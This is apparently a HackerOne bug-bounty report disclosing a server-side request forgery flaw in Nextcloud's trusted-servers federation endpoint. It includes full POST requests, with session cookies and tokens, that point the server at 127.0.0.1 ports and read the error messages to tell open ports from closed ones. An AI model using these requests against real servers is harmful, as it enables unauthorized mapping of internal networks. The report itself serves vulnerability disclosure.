Nextcloud: Server side request forgery (SSRF) on nextcloud implementation.

2016-06-17T19:27:26
ID H1:145524
Type hackerone
Reporter paglababa
Modified 2016-06-17T19:41:05

Description

An admin of nextcloud server can add other trusted nextcloud server in his own installation. The following request passes when a new add request is processed:

```http POST /nextcloud/index.php/apps/federation/trusted-servers HTTP/1.1 Host: myown.nextcloudserver.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: GAFcYDUGGyM0CCYeIlk4b19ADhwOFgcLOy4kERdDL1Q=:AL1VmGJMGqQsVhw59y9yE/wsjGJWMtc8DJljyuFMaI4= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 27 Cookie: oc6wp9sjado5=nnofa4hfq2esn7anu70hg3c2h0; oc_sessionPassphrase=dvniWxtCrcQk4Nbt4eXXmyZu5wUk3JoHziCUaCBcmeQFaM0333bS8HBwvFOAEwF2f0cnj9gewI7OSn1ELD3IiOysU3FOj%2FkA%2BV2kZ%2FUmc9UMQTzoZpp1VSLNUJXEKQkw; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true Connection: close

url=http://nextcloud.remote.server.com/ ```

This request initiates a cURL request to the POST variable. The response looks like this:

```http HTTP/1.1 400 Bad request Date: Fri, 17 Jun 2016 19:21:09 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'none';script-src 'self' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self' X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: Sameorigin X-Robots-Tag: none X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Content-Length: 117 Connection: close Content-Type: application/json; charset=utf-8

{"message":"Client error response [url] http:\/\/google.com\/status.php [status code] 404 [reason phrase] Not Found"} ```

Attack Scenario This feature can be used to launch SSRF attack to map the internal network. For example, this feature can be used to identify the internal open ports. Consider the following example:

```http POST /nextcloud/index.php/apps/federation/trusted-servers HTTP/1.1 Host: myown.nextcloudserver.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: GAFcYDUGGyM0CCYeIlk4b19ADhwOFgcLOy4kERdDL1Q=:AL1VmGJMGqQsVhw59y9yE/wsjGJWMtc8DJljyuFMaI4= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 23 Cookie: oc6wp9sjado5=nnofa4hfq2esn7anu70hg3c2h0; oc_sessionPassphrase=dvniWxtCrcQk4Nbt4eXXmyZu5wUk3JoHziCUaCBcmeQFaM0333bS8HBwvFOAEwF2f0cnj9gewI7OSn1ELD3IiOysU3FOj%2FkA%2BV2kZ%2FUmc9UMQTzoZpp1VSLNUJXEKQkw; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true Connection: close

url=http://127.0.0.1:80 ```

Response

json {"message":"Client error response [url] http:\/\/127.0.0.1\/status.php [status code] 404 [reason phrase] Not Found"}

This indicates that port 80 of the localhost is open. To check port 8080 we used http://127.0.0.1:8080 as POST value and the following response was received :

json {"message":"cURL error 7: Failed to connect to 127.0.0.1 port 8080: Connection refused"}

We received an error because the PORT 8080 of localhost was blocked.